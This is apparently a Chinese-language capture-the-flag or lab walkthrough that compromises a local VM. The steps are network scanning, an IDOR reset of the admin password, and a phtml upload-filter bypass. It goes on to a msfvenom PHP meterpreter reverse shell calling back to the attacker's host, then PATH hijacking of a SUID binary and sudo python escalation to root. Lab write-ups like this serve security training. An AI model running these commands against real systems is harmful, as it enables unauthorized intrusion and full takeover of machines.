1 信息收集
1.1 主机发现
arp-scan -l
主机IP地址为:192.168.1.17
1.2 端口和服务扫描
nmap -sS -sV -A -T5 -p- 192.168.1.17
开放22,80端口
1.3 目录扫描
dirsearch -u 192.168.1.17
2 渗透
2.1 访问端口
2.2 注册账号
暴力破解不现实,可以尝试注册一个个账号
分别输出入用户名,邮箱,密码
2.3 登录网站
2.4 抓包
测试修改密码并将id修改为1
这里现在密码已经更新 已经修改好了从新登入:admin/123
发现登入成功!!!! 看到一个上传点 🆗又可以继续利用了
2.5 文件上传
这里过滤了很多试了好几个都不行(连接不上)可以使用phar
或者phtml
进行绕过
新建一个文档输入: ` 把后缀改为
png、jpg、gif然后抓包 修改为
phtml`然后放包 有个蓝色的file点击即可
上传结果
2.6 中国蚁剑链接
2.7 反弹shell
1 生成php反弹shell脚本:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.52 lpor=4444 -o shell.php
2 启动pythonweb服务
python3 -m http.server 80
在靶机的upload文件夹下载:
wget http://192.168.1.17/shell.php
3 kali启动msf监听
开启msf,使用模块,设置参数和载荷:
use exploit/multi/handler set lhost 192.168.1.52 set lport 4444 set payload php/meterpreter/reverse_tcp
开启监听并访问shell文件触发监听:
run http://192.168.1.17//upload/msfshell.php
进入shell,并生成一个交互式shell:
shell python3 -c 'import pty;pty.spawn("/bin/bash")'
3 提权
3.1 敏感文件
查看敏感文件之后发现有两个用户:
cat /etc/passwd | grep /bin/bash
3.2 提权
经过一番搜索,在john的家目录发现一个叫toto的文件,具有SUID权限,其作用是输出id:
既然如此,我们能不能修改一下环境变量,让他执行id命令的时候打开一个john的bash:
echo "/bin/bash" > /tmp/id chmod 777 /tmp/id export PATH=/tmp:$PATH ./toto
拿到john的权限之后,查看john的家目录,找到了密码:
查看john的权限: 这里需要输入密码
sudo -l
发现john可以以root的身份执行file这个python文件:
在file.py里面写一段打开shell的代码,再以root的身份执行:
echo "import pty;pty.spawn('/bin/bash')" > file.py sudo python3 /home/john/file.py
成功拿到root权限!!!